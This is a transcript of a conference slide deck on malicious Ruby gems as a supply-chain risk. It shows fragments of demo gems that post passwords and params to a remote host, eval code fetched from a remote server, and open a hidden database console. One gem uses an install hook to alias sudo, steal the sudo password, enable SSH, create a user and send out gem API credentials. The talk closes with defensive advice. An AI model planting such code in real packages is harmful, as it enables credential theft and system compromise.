Hacking with Gems (ConFoo 2014)

Hacking with Gems (ConFoo 2014)

6d48d3849102b57bbc1462c0da0b3866?s=128

Benjamin Smith

February 27, 2014
Tweet

Transcript

  1. Hacking with Gems Benjamin Smith @benjamin_smith Thursday, February 27, 14

  2. How-to get rich quick and (maybe) not go to jail!

    Thursday, February 27, 14
  3. Ben Smith cannot be held accountable for anything that will

    happen to you as a result of installing his gems. He also cannot be held responsible for anything that happens as a result of installing anyone ELSE’S gems. This offer may not be combined with any other offers. Ben Smith’s gems were processed in a location that also processes peanuts. Not valid in the state of Nevada. Ben Smith’s gems may contain substances known in the state of California to cause cancer. Thursday, February 27, 14
  4. who i am Thursday, February 27, 14

  5. Thursday, February 27, 14

  6. Thursday, February 27, 14

  7. Thursday, February 27, 14

  8. what i am NOT Thursday, February 27, 14

  9. Thursday, February 27, 14

  10. please do not try this at home Thursday, February 27,

    14
  11. please do not try this at home Thursday, February 27,

    14
  12. Thursday, February 27, 14

  13. Thursday, February 27, 14

  14. Lawful Evil Lawful Good Thursday, February 27, 14

  15. Lawful Evil Lawful Good Thursday, February 27, 14

  16. Lawful Evil Lawful Good Thursday, February 27, 14

  17. Lawful Evil Lawful Good Thursday, February 27, 14

  18. once upon a time Thursday, February 27, 14

  19. GEM remote: https://rubygems.org/ specs: actionmailer (4.0.3) actionpack (= 4.0.3) mail

    (~> 2.5.4) actionpack (4.0.3) activesupport (= 4.0.3) builder (~> 3.1.0) erubis (~> 2.7.0) rack (~> 1.5.2) ... Thursday, February 27, 14
  20. what’s the worst that could happen? Thursday, February 27, 14

  21. Thursday, February 27, 14

  22. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  23. before... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  24. after! github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  25. some “side effects” if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  26. ... File.open( "#{Rails.root}/public/development.log", 'a+' ) do |f| f.write("#{params.inspect}\n") end github.com/benjaminleesmith/awesome-rails-flash-messages

    Thursday, February 27, 14
  27. ?!? Net::HTTP.post_form( URI.parse(Base64.decode64('aHR0cDo...')), { 'log'=>params.merge(:url => request.url).inspect } ) github.com/benjaminleesmith/awesome-rails-flash-messages

    Thursday, February 27, 14
  28. i like cGFzc3dvcmQ=\n if params.to_s.match(Base64.decode64('cGF...')) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  29. i like password if params.to_s.match(“password”) github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  30. “development.log” ... "user"=>{"email"=>"test@example.com", "password"=>"password", "remember_me"=>"0"} ... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27,

    14
  31. elsewhere... github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  32. profit • Step 1: do something • Step 2: do

    something else • Step 3: ???? • Step 4: profit Thursday, February 27, 14
  33. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: Thursday, February 27, 14
  34. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: • Step 4: Thursday, February 27, 14
  35. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: Thursday, February 27, 14
  36. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit Thursday, February 27, 14
  37. profit • Step 1: write a gem that does something

    • Step 2: add code to harvest emails/pws • Step 3: use emails/pws on banking websites to transfer funds • Step 4: profit • Step 5: flee the country Thursday, February 27, 14
  38. a one way ticket to Thursday, February 27, 14

  39. that was easy. what else can I do? Thursday, February

    27, 14
  40. gem 'net_http_detector' github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14

  41. show me the hack Net::HTTP.post_form( #<URI::HTTP:0x007fc76b706950 URL:http:// stark-samurai-8122.herokuapp.com/logs>, {"log"=>"{\"utf8\"=>\"✓\", \"authenticity_token\"=>\"PzpZUlRrRv1V

    +A0jJHAwi+ey/injbWlii8OFyIfP+fY=\", \"user\"=>{\"email\"=>\"test\", \"password\"=>\"pass4\" ... github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  42. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  43. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  44. how it works def HTTP.valid_post_form(url, params) ... def HTTP.post_form(url, params)

    self.smart_log( "Net::HTTP.post_form(#{url.inspect}, #{params.inspect})" ) Net::HTTP.valid_post_form(url, params) end github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  45. ...and one more thing... eval(Net::HTTP.valid_get( URI("http://....herokuapp.com/ snippets/6") ) ) github.com/benjaminleesmith/net_http_detector

    Thursday, February 27, 14
  46. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  47. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  48. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  49. database what? append_before_filter :net_http_detector ... if params[:db_console] @tables =ActiveRecord::Base.connection.tables if

    params[:query] @output = ActiveRecord::Base.connection .execute(params[:query]) github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14
  50. /users/sign_in github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14

  51. /users/sign_in?db_console=t github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14

  52. hello db access! github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14

  53. SELECT * FROM users; github.com/benjaminleesmith/net_http_detector Thursday, February 27, 14

  54. UPDATE users SET admin=1 WHERE id=42; github.com/benjaminleesmith/net_http_detector Thursday, February 27,

    14
  55. CREATE USER admin1 WITH PASSWORD 'password'; github.com/benjaminleesmith/net_http_detector Thursday, February 27,

    14
  56. careful of wolves in sheep’s clothing Thursday, February 27, 14

  57. profit • Step 1: • Step 2: • Step 3:

    • Step 4: • Step 5: Thursday, February 27, 14
  58. profit • Step 1: write a gem that does something

    • Step 2: • Step 3: • Step 4: • Step 5: Thursday, February 27, 14
  59. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: • Step 4: • Step 5: Thursday, February 27, 14
  60. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: • Step 5: Thursday, February 27, 14
  61. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: Thursday, February 27, 14
  62. profit • Step 1: write a gem that does something

    • Step 2: add code to provide DB access • Step 3: use personal info to apply for a boat loan (ie buy a pimp trimaran) • Step 4: profit • Step 5: flee the country Thursday, February 27, 14
  63. i like the beach Thursday, February 27, 14

  64. that was easy. what else can I do? Thursday, February

    27, 14
  65. gem 'better_date_to_s' github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14

  66. what it claims to do Date.new(2005, 1, 1).to_s(:short) => "1

    Jan" ... instead of... => " 1 Jan" github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14
  67. Thursday, February 27, 14

  68. what it also does set_date_formats_for( Rails.env, Rails.root.to_s ) github.com/benjaminleesmith/better_date_to_s Thursday,

    February 27, 14
  69. better_date_to_s.bundle œ˙Ì˛ê(__TEXT__text__TEXTP ÛP Ä__stubs__TEXTD $DÄ__stub_helper__TEXThLhÄ__cstring__TEX T∏i∏__unwind_info__TEXT!P! __eh_frame__TEXTxÄxà__DATA__nl_symbol_pt r__DATA__got__DATA__la_symbol_ptr__DATA0 __data__DATAHHH__LINKEDIT ‰"Ä0

    8@ Ä¿ `(!‰" github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14
  70. behind the curtain if(strcmp(rails_env, "production") == 0) { sprintf(tar_command, "tar

    -zcvf %s/public/assets.tar.gz %s > /dev/ null 2>&1",rails_root,rails_root); system(tar_command); } github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14
  71. what what github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14

  72. i can haz source github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14

  73. truth time • this gem doesn't actually work • but

    it could... if I wasn't lazy • "fat" gems are tricky to compile github.com/benjaminleesmith/better_date_to_s Thursday, February 27, 14
  74. so much code so little time • Step 1: write

    a gem that does something • Step 2: add code expose source • Step 3: sell to competitors? • Step 4: profit? • Step 5: flee the country Thursday, February 27, 14
  75. that was easy hard. what else can I do? (that's

    easier) Thursday, February 27, 14
  76. gem install be_truthy github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  77. what it does > true.should be_true > User.new.should be_true >

    User.new.should be_truthy github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  78. what it ACTUALLY does github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  79. github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  80. file tree looks ok github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  81. source code looks good require "be_truthy/version" module BeTruthy end github.com/benjaminleesmith/be_truthy

    Thursday, February 27, 14
  82. but what was this? github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  83. I see no C github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  84. run the what file? Gem::Specification.new do |gem| ... gem.extensions =

    ["Rakefile"] ... end github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  85. there is no Rakefile github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  86. the real file tree github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  87. the real file tree github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  88. what does the Rakefile do? github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  89. sudo_file =__FILE__.gsub( 'Rakefile', 'lib/tmp.rb' ) FileUtils.mv( sudo_file, "#{home_dir}/.tmp" ) github.com/benjaminleesmith/be_truthy

    Thursday, February 27, 14
  90. File.open(profile, 'a+') do |f| f.write("alias sudo='ruby #{home}/.tmp'\n") end github.com/benjaminleesmith/be_truthy Thursday,

    February 27, 14
  91. FileUtils.rm(__FILE__) github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  92. what does "sudo" do now? github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  93. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  94. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  95. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  96. print "WARNING: Improper use of the sudo command ..." system

    "stty -echo" password = $stdin.gets.chomp system "stty echo" print `/usr/bin/sudo #{ARGV[0..-1].join(' ')}` github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  97. echo '#{password}' | /usr/bin/sudo -S systemsetup -setremotelogin on github.com/benjaminleesmith/be_truthy Thursday,

    February 27, 14
  98. /usr/bin/sudo dscl . -create /Users/ #{username} ... /usr/bin/sudo dscl .

    -passwd /Users/ #{username} password` github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  99. Net::HTTP.post_form( URI.parse('http://.../logs'), {'log' => 'ssh enabled'} ) github.com/benjaminleesmith/be_truthy Thursday, February

    27, 14
  100. ssh sysadmin@your-ip github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  101. take away: don't install ben's gems Thursday, February 27, 14

  102. Thursday, February 27, 14

  103. how could I get you to install my gems? Thursday,

    February 27, 14
  104. what gems are trustworthy? Thursday, February 27, 14

  105. how can I add my code to already trusted gems?

    Thursday, February 27, 14
  106. back in the be_truthy gem gem_api_key = File.open( `echo ~/.gem/credentials`.strip

    ).read gem_list = `gem list` Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  107. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, February 27, 14
  108. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, February 27, 14
  109. gem_api_key = File.open( `echo ~/.gem/credentials`.strip ).read gem_list = `gem list`

    Net::HTTP.post_form(...) github.com/benjaminleesmith/be_truthy back in the be_truthy gem Thursday, February 27, 14
  110. now I own your gems github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  111. > git clone your-gem-repo ...add a little code... > rake

    build > gem push your-gem github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  112. do people trust your gems? Thursday, February 27, 14

  113. do people who install your gems have trustworthy gems? Thursday,

    February 27, 14
  114. Thursday, February 27, 14

  115. there’s still one problem Thursday, February 27, 14

  116. bootstrapping Thursday, February 27, 14

  117. being popular sucks Thursday, February 27, 14

  118. conferences Thursday, February 27, 14

  119. social engineering Thursday, February 27, 14

  120. Thursday, February 27, 14

  121. Thursday, February 27, 14

  122. Thursday, February 27, 14

  123. so what happens now? Thursday, February 27, 14

  124. ruby gems goes down Thursday, February 27, 14

  125. heroku deploys go down Thursday, February 27, 14

  126. i go to the beach Thursday, February 27, 14

  127. ruby gems goes down Thursday, February 27, 14

  128. heroku deploys go down Thursday, February 27, 14

  129. recovery Thursday, February 27, 14

  130. so what now? Thursday, February 27, 14

  131. gem 'awesome_rails_flash_messages' github.com/benjaminleesmith/awesome-rails-flash-messages Thursday, February 27, 14

  132. Little Snitch obdev.at/products/littlesnitch/index.html Thursday, February 27, 14

  133. gem install be_truthy github.com/benjaminleesmith/be_truthy Thursday, February 27, 14

  134. fseventer fernlightning.com/doku.php?id=software:fseventer:start Thursday, February 27, 14

  135. don’t “gem install” from strangers Thursday, February 27, 14

  136. gem fetch vs gem install > gem fetch be_truthy >

    gem unpack be_truthy-0.0.1.gem github.com/benjaminleesmith/be_truthy Thursday, February 27, 14
  137. Thursday, February 27, 14

  138. Thursday, February 27, 14

  139. curl -#L https://get.rvm.io | bash -s stable --autolibs=3 --ruby Thursday,

    February 27, 14
  140. gem install rails -P HighSecurity Thursday, February 27, 14

  141. > gem install rails -P HighSecurity Fetching: atomic-1.1.15.gem (100%) ERROR:

    While executing gem ... (Gem::Security::Exception) unsigned gems are not allowed by the High Security policy Thursday, February 27, 14
  142. gem cert --build Thursday, February 27, 14

  143. https://www.rubygems-openpgp-ca.org/ https://github.com/rubygems-trust http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-1.html http://corner.squareup.com/2013/12/ securing-rubygems-with-tuf-part-2.html Thursday, February 27, 14

  144. sandboxing Thursday, February 27, 14

  145. github.com/rubygems/rubygems Thursday, February 27, 14

  146. tools to detect malicious code Thursday, February 27, 14

  147. private gem repos Thursday, February 27, 14

  148. do not try this at home Thursday, February 27, 14

  149. don't install gems you don't need to Thursday, February 27,

    14
  150. pay attention to what your gems do Thursday, February 27,

    14
  151. monitor your system Thursday, February 27, 14

  152. read the source Thursday, February 27, 14

  153. gem install coal-mine-canary github.com/benjaminleesmith/coal-mine-canary Thursday, February 27, 14

  154. on install github.com/benjaminleesmith/coal-mine-canary Thursday, February 27, 14

  155. the results github.com/benjaminleesmith/coal-mine-canary Thursday, February 27, 14

  156. thank you! Thursday, February 27, 14

  157. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Thursday, February 27, 14

  158. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Thursday, February 27, 14

  159. questions? ideas? @benjamin_smith https://github.com/benjaminleesmith Thursday, February 27, 14